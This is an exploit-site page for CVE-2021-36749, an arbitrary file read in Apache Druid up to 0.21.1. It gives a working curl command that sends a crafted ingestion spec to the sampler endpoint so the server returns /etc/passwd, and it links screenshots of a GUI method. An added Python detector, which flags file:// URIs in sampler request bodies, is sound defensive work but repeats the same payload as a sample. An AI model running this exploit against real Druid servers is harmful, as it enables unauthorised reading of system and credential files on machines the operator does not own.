## https://sploitus.com/exploit?id=395F89FA-BC73-5540-B89C-DDB560DADA92
# CVE-2021-36749
Apache Druid arbitrary file read

Affected versions: version <= 0.21.1

Either of the following two methods works.

## Command-line method

```bash
# POST an ingestion spec to the sampler endpoint; the "http" firehose in the
# spec is handed a file:// URI, which versions <= 0.21.1 do not reject.
curl -X POST 'http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect' \
  -H 'Content-Type: application/json' \
  -d '{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_such_column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}'
```
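As an added defender-side check (not part of the original PoC), the following Python walks a captured sampler request body, as a reverse proxy or request-log hook would see it, and flags any firehose/inputSource URI whose scheme is not http or https. The two request records are constructed samples.

```python
import json
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
URI_KEYS = {"uris", "uri"}  # keys under which Druid's http firehose/inputSource lists URIs


def _walk(node, path=""):
    """Yield (json_path, value) for every string stored under a URI key."""
    if isinstance(node, dict):
        for key, val in node.items():
            child = f"{path}.{key}" if path else key
            if key in URI_KEYS:
                for item in (val if isinstance(val, list) else [val]):
                    if isinstance(item, str):
                        yield child, item
            else:
                yield from _walk(val, child)
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from _walk(val, f"{path}[{i}]")


def find_disallowed_uris(body):
    """Return [(json_path, uri)] for URIs whose scheme is not http/https."""
    try:
        spec = json.loads(body)
    except json.JSONDecodeError:
        return []
    hits = []
    for path, uri in _walk(spec):
        # strip(): stray whitespace around the URI must not hide its scheme
        if urlparse(uri.strip()).scheme.lower() not in ALLOWED_SCHEMES:
            hits.append((path, uri))
    return hits


# Constructed sample: one benign sampler request, one pointing at a local file.
SAMPLE_REQUESTS = [
    ("POST /druid/indexer/v1/sampler?for=connect",
     '{"type":"index","spec":{"ioConfig":{"type":"index","firehose":'
     '{"type":"http","uris":["https://example.org/data.json"]}}}}'),
    ("POST /druid/indexer/v1/sampler?for=connect",
     '{"type":"index","spec":{"ioConfig":{"type":"index","firehose":'
     '{"type":"http","uris":[" file:///etc/passwd "]}}}}'),
]


def scan(requests=SAMPLE_REQUESTS):
    """Return the (request_line, hits) pairs that warrant an alert."""
    return [(line, h) for line, body in requests if (h := find_disallowed_uris(body))]
```

The same check applies to spec submissions on the task and supervisor endpoints, since they accept the same firehose/inputSource structure.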

## GUI method

![1](https://i.loli.net/2021/10/14/bj27OYBhLDQSUw4.png)

![2](https://i.loli.net/2021/10/14/rGORHBnSfoesXhA.png)